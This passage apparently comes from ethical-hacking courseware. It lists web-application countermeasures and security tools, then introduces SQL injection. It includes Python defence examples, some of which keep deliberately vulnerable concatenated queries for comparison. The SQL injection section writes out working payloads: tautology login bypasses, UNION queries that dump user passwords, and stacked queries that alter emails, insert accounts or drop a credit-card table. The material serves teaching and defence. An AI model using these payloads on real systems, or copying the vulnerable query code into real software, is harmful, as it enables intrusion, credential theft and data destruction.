Browsers use cookies to maintain a session state. They also contain sensitive, session-specific data (e.g., user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs). Attackers engage in cookie/session poisoning by modifying the data in the cookie to gain escalated access or maliciously affect a user session. Developers must hence follow secure coding practices to secure web applications against such poisoning attacks. They must use proper session-token generation mechanisms to issue random session IDs.
Some countermeasures against cookie/session poisoning attacks are as follows:
- Do not store plaintext or weakly encrypted passwords in cookies
- Implement cookie timeout
- Cookie authentication credentials should be associated with an IP address
- Make logout functions available
- Validate all the cookie values to ensure that they are well-formed and correct
- Use virus and malware scanning software to protect the browser from any malicious scripts that hijack the cookies
- Clear stored cookies from the browser regularly
- Employ cookie randomization to change the website or a service cookie whenever the user makes a request
- Use a VPN that adopts high-grade encryption and traffic routing to prevent session sniffing
Web Service Attack
Use multiple layer protection and standard HTTP authentication techniques to defend against web service attacks. Because most business-to-business models incorporate applications, it becomes easier to restrict access to only valid users.
Some additional countermeasures against web service attacks are as follows:
- Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages
- Use document-centric authentication credentials that use SAML
- Use multiple security credentials such as X.509 Cert, SAML assertions, and WS-Security
- Deploy web-service-capable firewalls that can perform SOAP- and ISAPI-level filtering
- Configure firewalls/IDS systems for web service anomaly and signature detection
- Configure firewalls/IDS systems to filter improper SOAP and XML syntax
- Implement centralized in-line request and response schema validation
- Block external references and use pre-fetched content when de-referencing URLs
- Maintain and update a secure repository of XML schemas
- Use password digests/Kerberos tickets/X.509 certificates in SOAP headers for authentication
- Use a digital signature for signing messages at the recipient's end and maintain the integrity of the messages
- Use URL authorization to restrict access to the web service file (.asmx)
- Authorize access to WSDL files using NTFS permissions
- Disable the documentation protocols to prevent the dynamic generation of WSDL
- Verify the caller's endpoint in the SOAP message before determining whether the SOAP message is processed by the BPEL engine
- Disable the SOAPAction field such as createUser or deleteUser in the HTTP request
- Avoid using easily guessable SOAPAction terminologies
- Disable the SOAPAction attribute when not in use
- Make sure to compare the operation within the SOAPAction and the SOAP body
Clickjacking Attack
- Use a server-side method such as the X-Frame-Options header and use its options DENY, SAMEORIGIN, and ALLOW-FROM URI to prevent the site from being framed outside the domain
- Never use client-side methods such as Frame busting or Frame breaking as they can be bypassed easily
- Mask the HTML document and reveal it only after verifying that the page is not framed
- Use the Content-Security-Policy (CSP) HTTP header as it provides considerable flexibility for defining sources in complex deployments
JavaScript Hijacking
- Use .innerText rather than .innerHTML in JavaScript to encode the text automatically
- Avoid using the function eval due to its vulnerable nature
- Do not write serialization code
- Use the encoding library to safeguard the attributes and data elements and avoid building XML dynamically
- Use SSL/TLS for secure communication and perform encryption on the server instead of the client-side code
- Build XML using any appropriate framework; avoid building XML manually
- Make sure to return JSON with an object externally, such as {"result": [{"object": "inside array"}]}
Username Enumeration
- Ensure that inputs that include user identifiers produce only generic error messages and outputs
- Use randomly generated data for usernames instead of sequential numbers
- Employ proper defenses against SQL injection and XSS attacks to prevent dumpable user enumeration
- Always make sure to apply CAPTCHA to all the input-accepting pages to prevent automatic data collection
- Use a WAF to detect and block all the individual IP addresses that try to make several requests
- Apply two-factor authentication (2FA) or padding techniques to the response time to prevent username enumeration
- Use random and complex usernames when creating the Active Directory username list
- Always use only complex and difficult-to-guess passwords and change the default usernames and passwords
- Harden all the services to avoid establishing null bind and prevent remote root authentication
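The "generic error messages" and "padding techniques to the response time" countermeasures above, as an added Python example (not courseware code): a login routine that does the same scrypt work whether or not the account exists, returns one message for both failure cases, and pads every response to a minimum duration. The user table, dummy credential and minimum response time are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import time

GENERIC_MESSAGE = "Invalid username or password"
MIN_RESPONSE_SECONDS = 0.25     # every answer takes at least this long


def _scrypt(password: str, salt: bytes) -> bytes:
    return hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)


# Constructed user table: username -> (salt, key). The dummy credential is hashed once
# at import so unknown usernames cost exactly one scrypt, like known ones.
USERS = {}
_DUMMY_SALT = os.urandom(16)
_DUMMY_KEY = _scrypt("constructed-dummy-password", _DUMMY_SALT)


def add_user(username: str, password: str) -> None:
    salt = os.urandom(16)
    USERS[username] = (salt, _scrypt(password, salt))


def login(username: str, password: str, sleep=time.sleep, clock=time.monotonic) -> dict:
    """Returns {"ok", "message", "elapsed"}. The message is identical for an unknown user
    and a wrong password, the same hashing work is done in both cases, and the response
    is padded to MIN_RESPONSE_SECONDS so timing does not reveal which case occurred."""
    start = clock()
    salt, key = USERS.get(username, (_DUMMY_SALT, _DUMMY_KEY))
    computed = _scrypt(password, salt)
    # Evaluate both conditions unconditionally; no early return on "unknown user".
    password_matches = hmac.compare_digest(computed, key)
    ok = (username in USERS) and password_matches
    elapsed = clock() - start
    if elapsed < MIN_RESPONSE_SECONDS:
        sleep(MIN_RESPONSE_SECONDS - elapsed)
    return {
        "ok": ok,
        "message": "Login successful" if ok else GENERIC_MESSAGE,
        "elapsed": clock() - start,
    }
```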
Attack on Password Reset Mechanism
- Perform proper validation of the random token and email link combination before executing the request
- Ensure that all password reset URLs are used only once and set the expiry time limit
- Avoid automated requests generated through programs and enforce human checks using CAPTCHA
- Restrict the number of requests from any IP or device within a stipulated time
- Use advanced multi-factor authentication (MFA) techniques to prevent account hijacking with password reset tokens
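A reset-token service implementing the single-use, expiry, token+email validation and per-source rate-limit points above, added as a Python example (not courseware code). The TTL, request limit and injectable clock are constructed for the demonstration; only a hash of each token is kept server-side.

```python
import hashlib
import secrets
import time
from typing import Optional

TOKEN_TTL_SECONDS = 15 * 60
MAX_REQUESTS_PER_WINDOW = 3
WINDOW_SECONDS = 60 * 60


class ResetService:
    """Single-use, expiring reset tokens. Only SHA-256(token) is stored, so a leaked table
    yields no usable links; the token itself travels only in the emailed link."""

    def __init__(self, now=time.time):
        self.now = now
        self.tokens = {}      # sha256(token) -> {"email": str, "expires": float}
        self.requests = {}    # source (IP or device id) -> request timestamps

    def request_reset(self, email: str, source: str) -> Optional[str]:
        """Return the token to embed in the emailed link, or None when the source has
        exceeded MAX_REQUESTS_PER_WINDOW within WINDOW_SECONDS."""
        cutoff = self.now() - WINDOW_SECONDS
        recent = [t for t in self.requests.get(source, []) if t > cutoff]
        if len(recent) >= MAX_REQUESTS_PER_WINDOW:
            self.requests[source] = recent
            return None
        recent.append(self.now())
        self.requests[source] = recent
        token = secrets.token_urlsafe(32)
        self.tokens[self._digest(token)] = {"email": email, "expires": self.now() + TOKEN_TTL_SECONDS}
        return token

    def redeem(self, email: str, token: str) -> bool:
        """Validate the token+email combination from the link. The token is removed on the
        first attempt, so it is single-use even if the attempt fails."""
        rec = self.tokens.pop(self._digest(token), None)
        if rec is None:
            return False
        if rec["expires"] < self.now():
            return False
        return secrets.compare_digest(rec["email"], email)

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()
```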

How to Defend Against Web Application Attacks
To defend against web application attacks, you can follow the countermeasures stated earlier. To protect the web server, you can use a WAF firewall/IDS and filter packets. You also should regularly update the server's software using patches to protect it from attackers. Sanitize and filter the user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameter queries to retrieve data and disable verbose error messages that can provide attackers with useful information. Use custom error pages to protect the web applications. To avoid SQL injection into the database, connect using a non-privileged account and grant the least privileges to the database, tables, and columns. Disable commands such as xp_cmdshell, which can affect the OS.
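The "parameter queries" countermeasure above, shown beside the flawed concatenation it replaces, as an added Python/sqlite3 example (not courseware code). The in-memory users table and its rows are constructed for the demonstration; an apostrophe in a legitimate username is enough to show why the two forms differ.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table. Passwords are plaintext purely to keep the
    example short; real code stores a salted password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "constructed-admin-pw", "admin"),
        ("o'brien", "constructed-user-pw", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """The flawed pattern: input pasted into the SQL text, so a quote in the input changes
    the structure of the statement. Kept only as the 'before' of the fix."""
    query = (f"SELECT role FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """The countermeasure: a parameter query. The driver binds the values after the
    statement is compiled, so input is always data and never SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def vulnerable_query_breaks(conn, username, password) -> bool:
    """True when the concatenated query cannot even be parsed for this input, which is
    the same defect that lets crafted input alter the query's meaning."""
    try:
        login_vulnerable(conn, username, password)
    except sqlite3.OperationalError:
        return True
    return False
```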

RASP for Protecting Web Servers
Runtime Application Self Protection (RASP) is a technology that provides security to applications that run on a server. RASP can be used for detecting runtime attacks on the real-time software application layer and can provide better visibility of hidden vulnerabilities. RASP can detect any malicious activity in the incoming traffic and also validate data requests. RASP protects both web and non-web applications and it can be used to prevent fake programs from being executed inside the application. RASP performs continuous monitoring to help remediate attacks such as unknown zero-day attacks at an early stage without any human intervention.
The RASP layer is placed within the application code. It deploys by monitoring the traffic coming into the server and applies protection mechanisms whenever threat vectors are detected. All the requests are examined through the RASP layer present between the server and the application without affecting the performance of the application. Furthermore, RASP can generate minimized false positives.
Benefits of using RASP
- Visibility: RASP offers greater visibility and lets the user have a detailed view of the application to monitor the attacks
- Collaboration and DevOps: It provides better collaboration and DevOps as it offers transparency that can provide similar and detailed information to both security professionals and developers
- Penetration testing: The increased visibility of RASP helps in avoiding duplicate testing. It also provides information about successful attacks and previously tested applications
- Incident response: RASP supports logging and compliance to facilitate incident response for security by letting the user report on customized events without modifying the application

Figure 14.103: Overview of RASP
Bug Bounty Programs
A bug bounty program is a challenge or agreement hosted by organizations, websites, or software developers for tech-savvy individuals or ethical hackers to participate and break into their security to report the latest bugs and vulnerabilities. This program focuses on identifying the latest security flaws in the software or any web application that most security developers fail to detect and which may hence pose a great threat. Therefore, individuals or ethical hackers who report the vulnerabilities are rewarded accordingly based on the severity of the bugs. Thus, any threat or flaw that evades the developer can be mitigated before it paves the way to sophisticated cyber-attacks. Many white-hat hackers contribute to this program as part of a comprehensive vulnerability disclosure framework and get rewarded for their work.
Many organizations benefit from such programs, as they need to maintain a keen watch on their system security and identify ignored vulnerabilities. Most of the latest bugs that are not detected by legacy security testing techniques and software tools can be exploited, resulting in major data loss. Such programs can also help organizations to avoid loss of money and reputation in the case of a data breach, as offering rewards through the bug bounty program is more economical. Therefore, most of the large companies use this program for strengthening their security, which in turn enhances websites and programs.
Web Application Security Testing Tools
There are various web application security assessment tools available for scanning, detecting, and assessing the vulnerabilities/security of web applications. These tools reveal their security posture; you can use them to find ways to harden security and create robust web applications. Furthermore, these tools automate the process of accurate web application security assessment. This section discusses some web application security testing tools.
Acunetix WVS
Source: https://www.acunetix.com
Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc. It includes advanced penetration testing tools, such as HTTP Editor and HTTP Fuzzer. It scans the ports of a web server and runs security checks against network services. It also tests web forms and password-protected areas. Furthermore, it provides effective vulnerability management by allowing third-party issue trackers such as Jira, GitLab, GitHub, and FogBugz.

Figure 14.104: Screenshot of Acunetix Web Vulnerability Scanner

N-Stalker Web App Security Scanner
Source: https://www.nstalker.com
N-Stalker Web App Security Scanner checks for vulnerabilities such as SQL injection, XSS, and other known attacks. It is a useful security tool for developers, system/security administrators, IT auditors, and staff, as it incorporates the well-known "N-Stealth HTTP Security Scanner" and its database of 39,000 web attack signatures along with a component-oriented web application security assessment technology.
Figure 14.105: Screenshot of N-Stalker Web Application Security Scanner

Browser Exploitation Framework (BeEF)
Source: http://beefproject.com
The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool used to test and exploit web application and browser vulnerabilities. It provides the penetration tester with practical client-side attack vectors and leverages web application and browser-based vulnerabilities to assess the security of a target and perform further intrusions.
Figure 14.106: Screenshot of Browser Exploitation Framework (BeEF)

Some additional web application security testing tools are as follows:
- Metasploit (https://www.metasploit.com)
- PowerSploit (https://github.com)
- Watcher Web Security Tool (https://www.casaba.com)
- Netsparker (https://www.netsparker.com)
- Arachni (http://arachni-scanner.com)
Web Application Firewalls
Web application firewalls (WAFs) secure web applications, websites, and web services against known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Some of the most commonly used WAFs are as follows:
- dotDefender
Source: http://www.applicure.com
dotDefender™ is a software-based WAF that protects your website from malicious attacks such as SQL injection, path traversal, cross-site scripting, and others that result in website defacement. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.

Figure 14.107: Screenshot of dotDefender web application firewall

Some additional web application firewalls are as follows:
- ServerDefender VP (https://www.port80software.com)
- HCL AppScan® Standard (https://www.hcltech.com)
- Radware's AppWall (https://www.radware.com)
- Qualys WAF (https://www.qualys.com)
- Barracuda Web Application Firewall (https://www.barracuda.com)
Module Summary
This module presented various web application concepts. It also discussed web application attacks in detail. Furthermore, it described the web application hacking methodology in detail. In addition, it illustrated various web application hacking tools. It also discussed web API, webhooks, and web shell concepts. Moreover, it explained threat actors' ways of hacking web APIs, webhooks, and web shells. Subsequently, it presented various countermeasures against attempts to hack web applications. Finally, it ended with a detailed discussion on how to secure web applications via various security tools.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform SQL injection attacks on the target web application.
Certified Ethical Hacker

Module 15: SQL Injection
Module Objectives
SQL injection is the most common and devastating attack that attackers can launch to take control of a website. Attackers use various tricks and techniques to compromise data-driven web applications, causing organizations to incur severe losses in terms of money, reputation, data, and functionality. This module will discuss SQL injection attacks as well as the tools and techniques used by attackers to perform such attacks.
At the end of this module, you will be able to:
- Describe SQL injection concepts
- Perform various types of SQL injection attacks
- Describe the SQL injection methodology
- Use different SQL injection tools
- Explain different IDS evasion techniques
- Adopt SQL injection countermeasures
- Use different SQL injection detection tools
Module Flow (SQL Injection Concepts, Types of SQL Injection, SQL Injection Methodology, Evasion Techniques, Countermeasures)

SQL Injection Concepts
This section discusses the basic concepts of SQL injection attacks and their intensity. It starts with an introduction to SQL injection and the basics required to understand SQL injection attacks, followed by some examples of such attacks.
What is SQL Injection?
Structured Query Language (SQL) is a textual language used by a database server. SQL commands used to perform operations on the database include INSERT, SELECT, UPDATE, and DELETE. These commands are used to manipulate data in the database server.
Programmers use sequential SQL commands with client-supplied parameters, making it easier for attackers to inject commands. SQL injection is a technique used to take advantage of unsanitized input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database. Such attacks are possible because of a flaw in web applications and not because of any issue with the database or the web server.
SQL injection attacks use a series of malicious SQL queries or SQL statements to manipulate the database directly. An application often uses SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. SQL injection attacks work because the application does not properly validate an input before passing it to an SQL statement.
Why Bother about SQL Injection?
SQL injection is a major issue for all database-driven websites. An attack can be attempted on any normal website or software package based on how it is used and how it processes user-supplied data. SQL injection can be used to implement the following attacks:
- Authentication Bypass: Using this attack, an attacker logs onto an application without providing a valid username and password, and gains administrative privileges.
- Authorization Bypass: Using this attack, an attacker alters authorization information stored in the database by exploiting an SQL injection vulnerability.
- Information Disclosure: Using this attack, an attacker obtains sensitive information that is stored in the database.
- Compromised Data Integrity: Using this attack, an attacker defaces a web page, inserts malicious content into web pages, or alters the contents of a database.
- Compromised Availability of Data: Using this attack, an attacker deletes the database information, logs, or audit information stored in a database.
- Remote Code Execution: Using this attack, an attacker compromises the host OS.
SQL Injection and Server-side Technologies
Powerful server-side technologies such as ASP.NET and database servers allow developers to create dynamic, data-driven websites and web applications with incredible ease. These technologies implement business logic on the server side, which then serves incoming requests from clients. The server-side technology smoothly accesses, delivers, stores, and restores information. Various server-side technologies include ASP, ASP.NET, Cold Fusion, JSP, PHP, Python, Ruby on Rails, and so on. Some of these technologies are prone to SQL injection vulnerabilities, and applications developed using these technologies are vulnerable to SQL injection attacks. Web applications use various database technologies as part of their functionality. Some relational databases used for developing web applications include Microsoft SQL Server, Oracle, IBM DB2, and the open-source MySQL. Developers sometimes unknowingly ignore secure coding practices when using these technologies, which makes the applications and relational databases vulnerable to SQL injection attacks. These attacks do not exploit a specific software vulnerability; instead, they target websites and web applications that do not follow secure coding practices to access and manipulate the data stored in a relational database.


Understanding HTTP POST Request
An HTTP POST request is a method for carrying the requested data to the web server. Unlike the HTTP GET method, the HTTP POST request carries the requested data as a part of the message body. Thus, it is considered more secure than HTTP GET. HTTP POST requests can also pass large amounts of data to the server. They are ideal for communicating with an XML web service. These methods submit and retrieve data from the web server.
When a user provides information and clicks Submit, the browser submits a string to the web server that contains the user's credentials. This string is visible in the body of the HTTP or HTTPS POST request as follows:

select * from Users where (username = 'smith' and password = 'simpson');

Account Login
Username: smith
Password: simpson

<form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
Password: <input type=password name=password>
<input type=submit value=login>

Figure 15.1: Example of HTTP POST request


Understanding Normal SQL Query
A query is an SQL command. Programmers write and execute SQL code in the form of query statements. SQL queries include selecting data, retrieving data, inserting/updating data, and creating data objects such as databases and tables. Query statements begin with a command such as SELECT, UPDATE, CREATE, or DELETE. Queries are used in server-side technologies to communicate with an application's database. A user request supplies parameters to replace placeholders that may be used in the server-side language. From this, a query is constructed and then executed to fetch data or perform other tasks on the database.
The diagram below shows a typical SQL query. It is constructed with user-supplied values, and upon execution, it displays results from the database.

Figure 15.2: Example of normal SQL query (diagram: server-side code BadLogin.aspx and the constructed SQL query)
Understanding an SQL Injection Query
An SQL injection query exploits the normal execution of SQL. An attacker submits a request with values that will execute normally but return data from the database that the attacker seeks. The attacker can submit these malicious values because of the inability of the application to filter them before processing. If the values submitted by the users are not properly validated, then the application can potentially be targeted by an SQL injection attack.
An HTML form that receives and passes information posted by the user to the Active Server Pages (ASP) script running on an IIS web server is the best example of SQL injection. The information passed is the username and password. To create an SQL injection query, an attacker may submit the following values in application input fields, such as the username and password fields.
Username: Blah' or 1=1 --
Password: Springfield
As part of the normal execution of the query, these input values will replace placeholders, and the query will appear as follows:
SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield';
A close examination of this query reveals that the condition in the WHERE clause will always be true. This query successfully executes as there is no syntax error, and it does not violate the normal execution of the query.
The diagram below shows a typical SQL injection query.

Figure 15.3: Example of SQL injection attack (diagram: attacker launching SQL injection and the SQL query executed)


Understanding an SQL Injection Query - Code Analysis
Code analysis or code review is the most effective technique for identifying vulnerabilities or flaws in the code. An attacker exploits the vulnerabilities found in the code to gain access to the database. An attacker logs into an account by the following process:
1. A user enters a username and password that match a record in the Users table
2. A dynamically generated SQL query is used to retrieve the number of matching rows
3. The user is then authenticated and redirected to the requested page
4. When the attacker enters blah' or 1=1 --, then the SQL query will look like
SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1 --' AND Password=''
A pair of hyphens indicates the beginning of a comment in SQL; therefore, the query simply becomes
SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1
The server-side code builds this query by concatenating the text box contents directly into the SQL string:
string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "' AND Password='" + txtPassword.Text + "'";


Example of a Web Application Vulnerable to SQL Injection: BadProductList.aspx
The page shown in the figure below is a hacker's paradise because it allows an astute hacker to hijack it and obtain confidential information, change data in the database, damage the database records, and even create new database user accounts. Most SQL-compliant databases, including SQL Server, store metadata in a series of system tables with names such as sysobjects, syscolumns, sysindexes, and so on. Thus, a hacker could use the system tables to acquire database schema information to further compromise the database. For example, the following text entered into the txtFilter textbox may reveal the names of the user tables in the database:
' UNION SELECT id, name, '', 0 FROM sysobjects WHERE xtype ='U' --
In particular, the UNION statement is useful for a hacker because it splices the results of one query into another. In this case, the hacker has spliced the names of the user tables in the database into the original query of the Products table. The only trick is to match the number and data types of the columns with the original query. The previous query might reveal that a table named Users exists in the database. A second query could reveal the columns in the Users table. Using this information, the hacker might enter the following into the txtFilter textbox:
' UNION SELECT 0, UserName, Password, 0 FROM Users --
Entering this query reveals the usernames and passwords found in the Users table.
The page (BadProductList.aspx) displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. As with the previous example (BadLogin.aspx), this code is vulnerable to SQL injection attacks. The executed SQL query is dynamically constructed from a user-supplied input.
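The two vulnerable code paths discussed above (BadLogin.aspx and BadProductList.aspx) beside their parameterised counterparts, as an added example that is not part of the book or of the sample application it describes; it is written in Python against the standard library sqlite3 module so that it runs offline. The table names, the Count(*) login query and the inputs follow the text; the Products column list, the sample rows and the function names are assumptions made for this example.

```python
import sqlite3

# Constructed in-memory stand-in for the Users and Products tables that
# BadLogin.aspx and BadProductList.aspx query (rows are made up; the
# Products column list is assumed, not taken from the book).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Users (UserName TEXT, Password TEXT);
        INSERT INTO Users VALUES ('smith', 'simpson'), ('admin', 's3cret');
        CREATE TABLE Products (ProductId INTEGER, ProductName TEXT,
                               QuantityPerUnit TEXT, UnitPrice REAL);
        INSERT INTO Products VALUES (1, 'Chai', '10 boxes', 18.0),
                                    (2, 'Chang', '24 bottles', 19.0);
    """)
    return con

PRODUCT_SQL = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"

def bad_login(con, username, password):
    """BadLogin.aspx pattern: user text is concatenated into the statement."""
    qry = ("SELECT Count(*) FROM Users WHERE UserName='" + username +
           "' AND Password='" + password + "'")
    return con.execute(qry).fetchone()[0]

def good_login(con, username, password):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    qry = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return con.execute(qry, (username, password)).fetchone()[0]

def bad_product_filter(con, text):
    """BadProductList.aspx pattern: txtFilter is spliced into a LIKE clause."""
    sql = PRODUCT_SQL
    if text:
        sql += " WHERE ProductName LIKE '" + text + "'"
    return con.execute(sql).fetchall()

def good_product_filter(con, text):
    """Parameterised filter: a UNION in the text just fails to match a product."""
    sql, params = PRODUCT_SQL, ()
    if text:
        sql += " WHERE ProductName LIKE ?"
        params = (text,)
    return con.execute(sql, params).fetchall()

def stacked_query_blocked(con, text):
    """sqlite3's execute() refuses a second statement, so a piggybacked
    '; DROP TABLE ...' fails here even in the vulnerable code path. That is a
    driver property, not a defence: it does nothing against the cases above."""
    try:
        bad_product_filter(con, text)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True
    return False

def demo():
    """Run the book's inputs against both code paths and collect the results."""
    con = make_db()
    bypass = "blah' or 1=1 --"          # tautology plus end-of-line comment
    union = "x' UNION SELECT 0, UserName, Password, 0 FROM Users --"
    stacked = "x'; DROP TABLE Products; --"
    return {
        "bad_login": bad_login(con, bypass, "anything"),      # 2 rows: bypassed
        "good_login": good_login(con, bypass, "anything"),    # 0 rows: rejected
        "bad_filter": bad_product_filter(con, union),         # leaks Users rows
        "good_filter": good_product_filter(con, union),       # no product matches
        "stacked_blocked": stacked_query_blocked(con, stacked),
        "table_survives": con.execute(
            "SELECT count(*) FROM sqlite_master WHERE name='Products'").fetchone()[0],
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The vulnerable paths return a match count of 2 for the bypass string and the two Users rows for the UNION string; the parameterised paths return 0 and an empty list for the same inputs.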

Figure 15.4: Example of vulnerable web application - BadProductList.aspx
(Screenshot of http://www.certifiedhacker.com/BadProductList.aspx with the legible part of its code-behind; the comment marks where the attack occurs:)
private void cmdFilter_Click(object sender, System.EventArgs e) {
    ...
    bindDataGrid();
}
private DataView createDataView() {
    ...
    // This code is susceptible to SQL injection attacks
    ... " WHERE ProductName LIKE '" + txtFilter.Text + "'" ...
    return dtProducts.DefaultView;
}

Example of a Web Application Vulnerable to SQL Injection: Attack Analysis
Most websites provide search to enable users to find a specific product or service quickly. A separate Search field is maintained on the website in an area that is easily viewable. As with any other input field, attackers target this field to perform SQL injection attacks. An attacker enters specific input values in the Search field to perform an SQL injection attack.

Figure 15.5: Example of web application vulnerable to SQL injection (screenshot of the CertifiedHackerShop.com search field and the SQL query executed)


Examples of SQL Injection
An SQL injection query exploits the normal execution of SQL. The attacker uses various SQL commands to modify the values in the database.

Figure 15.6: Example of SQL injection attack (diagram: attacker launching SQL injection against the Forgot Password form of the vulnerable website CertifiedHacker.com, which asks for an email address to which a password reset link is sent)

The following table lists some examples of SQL injection attacks.

Example: Updating Table
Attacker SQL Query: blah'; UPDATE jb-customers SET jb-email = 'info@certifiedhacker.com' WHERE email ='jason@springfield.com;
SQL Query Executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah'; UPDATE jb-customers SET jb-email = 'info@certifiedhacker.com' WHERE email ='jason@springfield.com; --';

Example: Adding New Records
Attacker SQL Query: blah'; INSERT INTO jb-customers ('jb-email','jb-passwd','jb-login_id','jb-last_name') VALUES ('jason@springfield.com','hello','jason','jason springfield');
SQL Query Executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah'; INSERT INTO jb-customers ('jb-email','jb-passwd','jb-login_id','jb-last_name') VALUES ('jason@springfield.com','hello','jason','jason springfield'); --';

Example: Identifying the Table Name
Attacker SQL Query: blah' AND 1=(SELECT COUNT(*) FROM mytable); -- (Note: You will need to guess table names here)
SQL Query Executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE email = 'blah' AND 1=(SELECT COUNT(*) FROM mytable); --';

Example: Deleting a Table
Attacker SQL Query: blah'; DROP TABLE Creditcard; --
SQL Query Executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; DROP TABLE Creditcard; --';

Example: Returning More Data
Attacker SQL Query: blah' OR 1=1 --
SQL Query Executed: SELECT * FROM User_Data WHERE Email_ID = 'blah' OR 1=1 --

Table 15.1: Attack SQL queries

Module Flow
▪ SQL Injection Concepts
▪ Types of SQL Injection
▪ SQL Injection Methodology
▪ SQL Injection Tools
▪ Countermeasures

Types of SQL Injection
Attackers use various tricks and techniques to view, manipulate, insert, and delete data from an application's database. Depending on the technique used, there are several types of SQL injection attacks. This section discusses the various types of SQL injection attacks. Attackers use SQL injection attacks in many different ways by corrupting SQL queries.

In an SQL injection attack, the attacker injects malicious code through an SQL query that can read sensitive data and even can modify (insert/update/delete) it.
There are three main types of SQL injection:
▪ In-band SQL Injection: An attacker uses the same communication channel to perform the attack and retrieve the results. In-band attacks are commonly used and easy-to-exploit SQL injection attacks. The most commonly used in-band SQL injection attacks are error-based SQL injection and UNION SQL injection.
▪ Blind/Inferential SQL Injection: In blind/inferential injection, the attacker has no error messages from the system to work on. Instead, the attacker simply sends a malicious SQL query to the database. This type of SQL injection takes a longer time to execute because the result returned is generally in Boolean form. Attackers use true or false results to determine the structure of the database and the data. In the case of inferential SQL injection, no data is transmitted through the web application, and it is not possible for an attacker to retrieve the actual result of the injection; therefore, it is called blind SQL injection.
▪ Out-of-Band SQL Injection: Attackers use different communication channels (such as database email functionality or file writing and loading functions) to perform the attack and obtain the results. This type of attack is difficult to perform because the attacker needs to communicate with the server and determine the features of the database server used by the web application.
The diagram below shows the different types of SQL injection:
Figure 15.7: Types of SQL injection


In-Band SQL Injection
In in-band SQL injection, attackers use the same communication channel to perform the attack and retrieve the results. Depending on the technique used, there are various types of in-band SQL injection attacks. The most commonly used in-band SQL injection attacks are error-based SQL injection and UNION SQL injection.
The different types of in-band SQL injection are as follows:
▪ Error-based SQL Injection
An attacker intentionally inserts bad inputs into an application, causing it to return database errors. The attacker reads the resulting database-level error messages to find an SQL injection vulnerability in the application. Accordingly, the attacker then injects SQL queries that are specifically designed to compromise the data security of the application. This approach is very useful to build a vulnerability-exploiting request.
▪ System Stored Procedure
The risk of executing a malicious SQL query in a stored procedure increases if the web application does not sanitize the user inputs used to dynamically construct SQL statements for that stored procedure. An attacker may use malicious inputs to execute the malicious SQL statements in the stored procedure. Attackers exploit databases' stored procedures to perpetrate their attacks.
For example,
Create procedure Login @user_name varchar(20), @password varchar(20) As
Declare @query varchar(250)
Set @query = 'Select 1 from usertable Where username = ' + @user_name + ' and password = ' + @password
exec(@query)
Go
If the attacker enters the following inputs in the application input fields using the above stored procedure running in the backend, he/she will be able to log in with any password.
User input: anyusername' or 1=1' anypassword
▪ Illegal/Logically Incorrect Query
An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables, and so on. In this SQL injection attack, an attacker intentionally sends an incorrect query to the database to generate an error message that may be useful for performing further attacks. This technique may help an attacker to extract the structure of the underlying database.
For example, to find the column name, an attacker may give the following malicious input:
Username: 'Bob"
The resultant query will be
SELECT * FROM Users WHERE UserName = 'Bob"' AND Password="xxx"
After executing the above query, the database may return the following error message:
"Incorrect Syntax near 'Bob'. Unclosed quotation mark after the character string " AND Password="xxx""
▪ UNION SQL Injection
The "UNION SELECT" statement returns the union of the intended dataset and the target dataset. In a UNION SQL injection, an attacker uses a UNION clause to append a malicious query to the requested query, as shown in the following example:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
The attacker checks for the UNION SQL injection vulnerability by adding a single quote character (') to the end of a ".php? id=" command. The type of error message received will tell the attacker if the database is vulnerable to a UNION SQL injection.
▪ Tautology
In a tautology-based SQL injection attack, an attacker uses a conditional OR clause such that the condition of the WHERE clause will always be true. Such an attack can be used to bypass user authentication.
For example,
SELECT * FROM users WHERE name = '' OR '1'='1'
This query will always be true, as the second part of the OR clause is always true.

